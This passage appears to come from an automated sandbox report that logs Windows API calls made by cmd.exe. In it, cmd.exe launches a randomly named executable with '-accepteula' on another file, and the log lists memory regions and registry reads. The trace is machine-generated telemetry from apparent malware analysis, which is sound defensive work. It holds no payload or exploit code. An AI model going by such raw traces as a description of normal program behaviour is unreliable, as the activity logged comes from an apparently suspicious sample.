(_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0297.397] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0297.398] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0297.398] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0297.399] SetErrorMode (uMode=0x0) returned 0x0 [0297.399] SetErrorMode (uMode=0x1) returned 0x0 [0297.399] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x11aa178, lpFilePart=0xf4f254 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xf4f254*="Desktop") returned 0x1d [0297.399] SetErrorMode (uMode=0x0) returned 0x1 [0297.399] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0297.399] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0297.404] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0297.405] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0297.406] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0xf4f000, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xf4f000) returned 0x11a9568 [0297.406] FindClose (in: hFindFile=0x11a9568 | out: hFindFile=0x11a9568) returned 1 [0297.406] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0297.406] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0297.406] GetConsoleTitleW (in: lpConsoleTitle=0xf4f4d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0297.407] InitializeProcThreadAttributeList (in: lpAttributeList=0xf4f400, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xf4f3e4 | out: lpAttributeList=0xf4f400, lpSize=0xf4f3e4) returned 1 [0297.407] UpdateProcThreadAttribute (in: lpAttributeList=0xf4f400, dwFlags=0x0, Attribute=0x60001, lpValue=0xf4f3ec, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xf4f400, lpPreviousValue=0x0) returned 1 [0297.407] GetStartupInfoW (in: lpStartupInfo=0xf4f438 | out: lpStartupInfo=0xf4f438*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x38, hStdOutput=0xc0, hStdError=0x40)) [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"exp", _MaxCount=0x7) returned -3 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0297.407] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0297.408] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0297.408] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0297.408] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0297.408] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0297.408] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0297.408] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0297.409] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula \"expenditurevincenttablet.exe\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xf4f388*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"expenditurevincenttablet.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf4f3d4 | out: lpCommandLine="vIDhS3md.exe -accepteula \"expenditurevincenttablet.exe\" -nobanner", lpProcessInformation=0xf4f3d4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xcb4, dwThreadId=0xcb8)) returned 1 [0297.415] CloseHandle (hObject=0xa4) returned 1 [0297.415] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0297.415] GetEnvironmentStringsW () returned 0x11a81e0* [0297.415] FreeEnvironmentStringsA (penv="=") returned 1 [0297.415] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0299.514] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xf4f36c | out: lpExitCode=0xf4f36c*=0x1) returned 1 [0299.514] CloseHandle (hObject=0xa8) returned 1 [0299.514] _vsnwprintf (in: _Buffer=0xf4f454, _BufferCount=0x13, _Format="%08X", _ArgList=0xf4f374 | out: _Buffer="00000001") returned 8 [0299.514] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0299.514] GetEnvironmentStringsW () returned 0x11a81e0* [0299.514] FreeEnvironmentStringsA (penv="=") returned 1 [0299.514] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0299.514] GetEnvironmentStringsW () returned 0x11a81e0* [0299.514] FreeEnvironmentStringsA (penv="=") returned 1 [0299.514] DeleteProcThreadAttributeList (in: lpAttributeList=0xf4f400 | out: lpAttributeList=0xf4f400) [0299.514] _get_osfhandle (_FileHandle=1) returned 0xc0 [0299.514] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0299.514] _get_osfhandle (_FileHandle=1) returned 0xc0 [0299.514] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0299.514] _get_osfhandle (_FileHandle=0) returned 0x38 [0299.515] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0299.587] SetConsoleInputExeNameW () returned 0x1 [0299.587] GetConsoleOutputCP () returned 0x1b5 [0299.587] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0299.587] SetThreadUILanguage (LangId=0x0) returned 0x409 [0299.587] exit (_Code=1) Thread: id = 1001 os_tid = 0xc8c Process: id = "144" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5bde7000" os_pid = "0xc60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "95" os_parent_pid = "0x974" cmd_line = "C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"restaurant.exe\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9952 start_va = 0xad0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 9953 start_va = 0xaf0000 end_va = 0xaf1fff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 9954 start_va = 0xb00000 end_va = 0xb13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 9955 start_va = 0xb20000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 9956 start_va = 0xb60000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 9957 start_va = 0xc60000 end_va = 0xc63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 9958 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 9959 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 9960 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9961 start_va = 0x7e6a0000 end_va = 0x7e6c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e6a0000" filename = "" Region: id = 9962 start_va = 0x7e6c9000 end_va = 0x7e6cbfff entry_point = 0x0 region_type = private name = "private_0x000000007e6c9000" filename = "" Region: id = 9963 start_va = 0x7e6cc000 end_va = 0x7e6ccfff entry_point = 0x0 region_type = private name = "private_0x000000007e6cc000" filename = "" Region: id = 9964 start_va = 0x7e6cf000 end_va = 0x7e6cffff entry_point = 0x0 region_type = private name = "private_0x000000007e6cf000" filename = "" Region: id = 9965 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9966 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9967 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 9968 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9969 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 9970 start_va = 0xc70000 end_va = 0xc70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c70000" filename = "" Region: id = 9971 start_va = 0xc80000 end_va = 0xc81fff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 9972 start_va = 0xcd0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 9973 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9974 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9975 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9976 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9977 start_va = 0xce0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 9978 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9979 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9980 start_va = 0xad0000 end_va = 0xadffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 9981 start_va = 0x7e5a0000 end_va = 0x7e69ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e5a0000" filename = "" Region: id = 10076 start_va = 0xce0000 end_va = 0xd9dfff entry_point = 0xce0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10077 start_va = 0xde0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 10078 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10079 start_va = 0xc90000 end_va = 0xccffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 10080 start_va = 0xee0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 10081 start_va = 0xfe0000 end_va = 0x102ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 10082 start_va = 0x7e6c6000 end_va = 0x7e6c8fff entry_point = 0x0 region_type = private name = "private_0x000000007e6c6000" filename = "" Region: id = 10083 start_va = 0xae0000 end_va = 0xae3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 10209 start_va = 0xaf0000 end_va = 0xaf3fff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 10212 start_va = 0x1030000 end_va = 0x1366fff entry_point = 0x1030000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 996 os_tid = 0xc64 [0296.884] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0296.884] __set_app_type (_Type=0x1) [0296.884] __p__fmode () returned 0x77984d6c [0296.884] __p__commode () returned 0x77985b1c [0296.884] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0296.884] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0296.884] GetCurrentThreadId () returned 0xc64 [0296.884] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc64) returned 0x84 [0296.884] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0296.885] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0296.885] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.978] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0296.978] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xc5f740 | out: phkResult=0xc5f740*=0x0) returned 0x2 [0296.979] VirtualQuery (in: lpAddress=0xc5f747, lpBuffer=0xc5f6f8, dwLength=0x1c | out: lpBuffer=0xc5f6f8*(BaseAddress=0xc5f000, AllocationBase=0xb60000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0296.979] VirtualQuery (in: lpAddress=0xb60000, lpBuffer=0xc5f6f8, dwLength=0x1c | out: lpBuffer=0xc5f6f8*(BaseAddress=0xb60000, AllocationBase=0xb60000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0296.979] VirtualQuery (in: lpAddress=0xb61000, lpBuffer=0xc5f6f8, dwLength=0x1c | out: lpBuffer=0xc5f6f8*(BaseAddress=0xb61000, AllocationBase=0xb60000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0296.979] VirtualQuery (in: lpAddress=0xb63000, lpBuffer=0xc5f6f8, dwLength=0x1c | out: lpBuffer=0xc5f6f8*(BaseAddress=0xb63000, AllocationBase=0xb60000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0296.979] VirtualQuery (in: lpAddress=0xc60000, lpBuffer=0xc5f6f8, dwLength=0x1c | out: lpBuffer=0xc5f6f8*(BaseAddress=0xc60000, AllocationBase=0xc60000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0296.979] GetConsoleOutputCP () returned 0x1b5 [0297.106] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0297.106] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0297.106] _get_osfhandle (_FileHandle=1) returned 0xc0 [0297.106] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0297.106] _get_osfhandle (_FileHandle=1) returned 0xc0 [0297.106] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0297.106] _get_osfhandle (_FileHandle=0) returned 0x38 [0297.106] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0297.284] GetEnvironmentStringsW () returned 0xde7f60* [0297.284] FreeEnvironmentStringsA (penv="=") returned 1 [0297.284] GetEnvironmentStringsW () returned 0xde7f60* [0297.284] FreeEnvironmentStringsA (penv="=") returned 1 [0297.284] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xc5e6a4 | out: phkResult=0xc5e6a4*=0x94) returned 0x0 [0297.284] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xc5e6a8, lpData=0xc5e6b0, lpcbData=0xc5e6ac*=0x1000 | out: lpType=0xc5e6a8*=0x0, lpData=0xc5e6b0*=0xb0, lpcbData=0xc5e6ac*=0x1000) returned 0x2 [0297.285] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xc5e6a8, lpData=0xc5e6b0, lpcbData=0xc5e6ac*=0x1000 | out: lpType=0xc5e6a8*=0x4, lpData=0xc5e6b0*=0x1, lpcbData=0xc5e6ac*=0x4) returned 0x0 [0297.285] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xc5e6a8, lpData=0xc5e6b0, lpcbData=0xc5e6ac*=0x1000 | out: lpType=0xc5e6a8*=0x0, lpData=0xc5e6b0*=0x1, lpcbData=0xc5e6ac*=0x1000) returned 0x2 [0297.285] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xc5e6a8, lpData=0xc5e6b0, lpcbData=0xc5e6ac*=0x1000 | out: lpType=0xc5e6a8*=0x4, lpData=0xc5e6b0*=0x0, lpcbData=0xc5e6ac*=0x4) returned 0x0 [0297.285] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xc5e6a8, lpData=0xc5e6b0, lpcbData=0xc5e6ac*=0x1000 | out: lpType=0xc5e6a8*=0x4, lpData=0xc5e6b0*=0x40, lpcbData=0xc5e6ac*=0x4) returned 0x0 [0297.285] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xc5e6a8, lpData=0xc5e6b0, lpcbData=0xc5e6ac*=0x1000 | out: lpType=0xc5e6a8*=0x4, lpData=0xc5e6b0*=0x40, lpcbData=0xc5e6ac*=0x4) returned 0x0 [0297.285] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xc5e6a8, lpData=0xc5e6b0, lpcbData=0xc5e6ac*=0x1000 | out: lpType=0xc5e6a8*=0x0, lpData=0xc5e6b0*=0x40, lpcbData=0xc5e6ac*=0x1000) returned 0x2 [0297.285] RegCloseKey (hKey=0x94) returned 0x0 [0297.285] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xc5e6a4 | out: phkResult=0xc5e6a4*=0x94) returned 0x0 [0297.285] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xc5e6a8, lpData=0xc5e6b0, lpcbData=0xc5e6ac*=0x1000 | out: lpType=0xc5e6a8*=0x0, lpData=0xc5e6b0*=0x40, lpcbData=0xc5e6ac*=0x1000) returned 0x2 [0297.285] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xc5e6a8, lpData=0xc5e6b0, lpcbData=0xc5e6ac*=0x1000 | out: lpType=0xc5e6a8*=0x4, lpData=0xc5e6b0*=0x1, lpcbData=0xc5e6ac*=0x4) returned 0x0 [0297.285] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xc5e6a8, lpData=0xc5e6b0, lpcbData=0xc5e6ac*=0x1000 | out: lpType=0xc5e6a8*=0x0, lpData=0xc5e6b0*=0x1, lpcbData=0xc5e6ac*=0x1000) returned 0x2 [0297.285] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xc5e6a8, lpData=0xc5e6b0, lpcbData=0xc5e6ac*=0x1000 | out: lpType=0xc5e6a8*=0x4, lpData=0xc5e6b0*=0x0, lpcbData=0xc5e6ac*=0x4) returned 0x0 [0297.285] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xc5e6a8, lpData=0xc5e6b0, lpcbData=0xc5e6ac*=0x1000 | out: lpType=0xc5e6a8*=0x4, lpData=0xc5e6b0*=0x9, lpcbData=0xc5e6ac*=0x4) returned 0x0 [0297.285] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xc5e6a8, lpData=0xc5e6b0, lpcbData=0xc5e6ac*=0x1000 | out: lpType=0xc5e6a8*=0x4, lpData=0xc5e6b0*=0x9, lpcbData=0xc5e6ac*=0x4) returned 0x0 [0297.285] 